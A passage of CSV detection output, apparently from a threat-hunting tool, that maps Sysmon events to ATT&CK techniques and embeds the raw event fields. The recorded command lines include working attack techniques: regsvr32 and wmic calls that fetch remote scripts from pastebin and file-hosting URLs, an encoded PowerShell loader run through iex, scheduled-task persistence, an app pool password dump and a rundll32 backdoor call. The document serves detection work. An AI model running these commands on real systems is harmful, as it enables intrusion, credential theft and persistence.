UAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558630145.862062,2019-05-23T20:49:05.862062+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic process list /format:"https://a.uguu.se/x50IGVBRfr55_test.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 892 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-23 16:49:05.686 + 365ABB72-CF01-5CE6-0000-00105DA50C00 + 3872 + C:\Windows\System32\wbem\WMIC.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + wmic process list /format:"https://a.uguu.se/x50IGVBRfr55_test.xsl" + c:\ + IEWIN7\IEUser + 365ABB72-CE6C-5CE6-0000-002047F30000 + 0xf347 + 1 + High + SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 + 365ABB72-CE84-5CE6-0000-001094130600 + 2940 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1557686106.562199,2019-05-12T22:35:06.562199+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16793 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:35:05.765 + 365ABB72-6759-5CD8-0000-001085031000 + 1912 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-63FC-5CD8-0000-0020EE3E0100 + 0x13eee + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-6759-5CD8-0000-0010E2D50F00 + 1420 + C:\Windows\System32\regsvr32.exe + regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557686106.562199,2019-05-12T22:35:06.562199+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16793 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:35:05.765 + 365ABB72-6759-5CD8-0000-001085031000 + 1912 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-63FC-5CD8-0000-0020EE3E0100 + 0x13eee + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-6759-5CD8-0000-0010E2D50F00 + 1420 + C:\Windows\System32\regsvr32.exe + regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1564436008.250664,2019-07-30T01:33:28.250664+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4915 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-29 21:33:24.152 + 747F3D96-6623-5D3F-0000-0010BC068800 + 3000 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49828 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1555606624.681038,2019-04-18T20:57:04.681038+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /user) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 14 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1033,technique_name=System Owner/User Discovery + 2019-04-18 16:56:24.833 + 365ABB72-AC38-5CB8-0000-0010365E0800 + 3576 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /user + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-AB27-5CB8-0000-002021CA0000 + 0xca21 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + Powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1555606624.681038,2019-04-18T20:57:04.681038+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /user ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 14 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1033,technique_name=System Owner/User Discovery + 2019-04-18 16:56:24.833 + 365ABB72-AC38-5CB8-0000-0010365E0800 + 3576 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /user + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-AB27-5CB8-0000-002021CA0000 + 0xca21 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + Powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\schtasks.exe ) through command line ( C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6195 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + Persistence - Scheduled Task Management + 2019-05-27 15:12:59.558 + 365ABB72-FE7B-5CEB-0000-0010D6820C00 + 4044 + C:\Windows\System32\schtasks.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Manages scheduled tasks + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 + 365ABB72-FE7B-5CEB-0000-0010867F0C00 + 4012 + C:\Windows\System32\cmd.exe + cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.041809,2019-05-27T05:29:18.041809+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5910 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.011 + 365ABB72-3D6E-5CEB-0000-00104C83FF00 + 2472 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-11 17:58:50.075 + 365ABB72-0D5A-5CD7-0000-001069031700 + 2544 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + c:\Windows\System32\cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-8693-5CD7-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-0D3F-5CD7-0000-00107F541600 + 3212 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-11 17:58:50.075 + 365ABB72-0D5A-5CD7-0000-001069031700 + 2544 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + c:\Windows\System32\cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-8693-5CD7-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-0D3F-5CD7-0000-00107F541600 + 3212 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-11 17:58:50.075 + 365ABB72-0D5A-5CD7-0000-001069031700 + 2544 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + c:\Windows\System32\cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-8693-5CD7-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-0D3F-5CD7-0000-00107F541600 + 3212 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16792 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:35:05.140 + 365ABB72-6759-5CD8-0000-0010E2D50F00 + 1420 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-63FC-5CD8-0000-0020EE3E0100 + 0x13eee + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-6693-5CD8-0000-0010AE4C0E00 + 3528 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 18918 + + + + + Microsoft-Windows-Sysmon/Operational + DC1.insecurebank.local + + + + + technique_id=T1033,technique_name=System Owner/User Discovery + 2019-05-16 16:08:40.350 + DFAE8213-8B08-5CDD-0000-001011CE0A00 + 3764 + C:\Windows\System32\whoami.exe + 6.3.9600.16384 (winblue_rtm.130821-1623) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + DFAE8213-832F-5CDD-0000-0020E7030000 + 0x3e7 + 2 + System + SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47 + DFAE8213-8B02-5CDD-0000-00109BCA0A00 + 1720 + C:\Windows\System32\osk.exe + "C:\Windows\System32\osk.exe" + +",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16792 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:35:05.140 + 365ABB72-6759-5CD8-0000-0010E2D50F00 + 1420 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-63FC-5CD8-0000-0020EE3E0100 + 0x13eee + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-6693-5CD8-0000-0010AE4C0E00 + 3528 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16792 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:35:05.140 + 365ABB72-6759-5CD8-0000-0010E2D50F00 + 1420 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-63FC-5CD8-0000-0020EE3E0100 + 0x13eee + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-6693-5CD8-0000-0010AE4C0E00 + 3528 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243538 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.021 + 747F3D96-9F69-5E75-0000-00106F6A2000 + 2536 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1589329703.257302,2020-05-13T04:28:23.257302+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 148597 + + + + + 